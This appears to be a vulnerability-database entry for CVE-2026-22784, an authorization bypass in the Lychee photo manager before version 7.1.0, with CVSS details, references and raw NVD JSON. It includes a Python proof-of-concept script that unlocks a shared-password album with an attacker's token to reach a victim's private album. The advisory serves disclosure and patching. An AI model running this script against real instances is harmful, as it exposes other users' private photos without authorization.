Security Vulnerability Report
CVE-2026-22784 CVSS 4.3 MEDIUM

CVE-2026-22784

Published: 2026-01-12 19:16:04
Last Modified: 2026-01-16 18:39:43

Description

Lychee is a free, open-source photo-management tool. Prior to 7.1.0, an authorization vulnerability exists in Lychee's album password unlock functionality that allows users to gain possibly unauthorized access to other users' password-protected albums. When a user unlocks a password-protected public album, the system automatically unlocks ALL other public albums that share the same password, resulting in a complete authorization bypass. This vulnerability is fixed in 7.1.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:lycheeorg:lychee:*:*:*:*:*:*:*:* - VULNERABLE
Lychee < 7.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-22784 PoC - Lychee Authorization Bypass
# Description: When unlocking one password-protected album, all albums sharing
# the same password are automatically unlocked
import requests

TARGET_URL = "http://target-lychee-instance.com"
ATTACKER_TOKEN = "attacker_session_token"
ALBUM_ID_VICTIM = "victim_album_id_123"
ALBUM_ID_ATTACKER = "attacker_album_id_456"
SHARED_PASSWORD = "password123"


def unlock_album(album_id, password):
    """Unlock a password-protected album"""
    url = f"{TARGET_URL}/api/Album::unlock"
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }
    data = {
        "albumID": album_id,
        "password": password,
    }
    response = requests.post(url, headers=headers, json=data)
    return response.json()


def list_albums():
    """List all accessible albums after unlocking"""
    url = f"{TARGET_URL}/api/Album::get"
    headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"}
    response = requests.get(url, headers=headers)
    return response.json()


# Step 1: Unlock attacker's own album with known password
print("[*] Step 1: Unlocking attacker's album with password...")
result = unlock_album(ALBUM_ID_ATTACKER, SHARED_PASSWORD)
print(f"[+] Result: {result}")

# Step 2: The vulnerability automatically unlocks ALL albums with same password
# including victim's private album
print("[*] Step 2: Checking if victim's album is now accessible...")
albums = list_albums()
for album in albums:
    if album["id"] == ALBUM_ID_VICTIM:
        print(f"[!] VULNERABLE: Victim's album '{album['title']}' is now accessible!")
        print("[!] Attacker can now view private photos in victim's album")
        break

print("[*] Exploitation complete - Authorization bypass successful")
```

References

https://github.com/LycheeOrg/Lychee/commit/f021a29f9ab2bafa81d9f5e32ff5bc89915c7d41 (Patch)
https://github.com/LycheeOrg/Lychee/security/advisories/GHSA-jj56-2c54-4f25 (Third Party Advisory, Exploit)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-22784",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-12T19:16:04.127",
    "lastModified": "2026-01-16T18:39:42.707",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Lychee is a free, open-source photo-management tool. Prior to 7.1.0, an authorization vulnerability exists in Lychee's album password unlock functionality that allows users to gain possibly unauthorized access to other users' password-protected albums. When a user unlocks a password-protected public album, the system automatically unlocks ALL other public albums that share the same password, resulting in a complete authorization bypass. This vulnerability is fixed in 7.1.0."
      },
      {
        "lang": "es",
        "value": "Lychee es una herramienta de gestión de fotos gratuita y de código abierto. Anterior a la versión 7.1.0, existe una vulnerabilidad de autorización en la funcionalidad de desbloqueo de álbumes con contraseña de Lychee que permite a los usuarios obtener acceso posiblemente no autorizado a los álbumes protegidos con contraseña de otros usuarios. Cuando un usuario desbloquea un álbum público protegido con contraseña, el sistema desbloquea automáticamente TODOS los demás álbumes públicos que comparten la misma contraseña, lo que resulta en una omisión completa de la autorización. Esta vulnerabilidad se corrigió en la versión 7.1.0."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 2.3,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "privilegesRequired": "NONE",
            "userInteraction": "PASSIVE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:lycheeorg:lychee:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "7.1.0",
                "matchCriteriaId": "521F7223-F9F1-48E5-8ECF-A5DC4188BDEC"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/LycheeOrg/Lychee/commit/f021a29f9ab2bafa81d9f5e32ff5bc89915c7d41",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/LycheeOrg/Lychee/security/advisories/GHSA-jj56-2c54-4f25",
        "source": "[email protected]",
        "tags": ["Third Party Advisory", "Exploit"]
      }
    ]
  }
}
```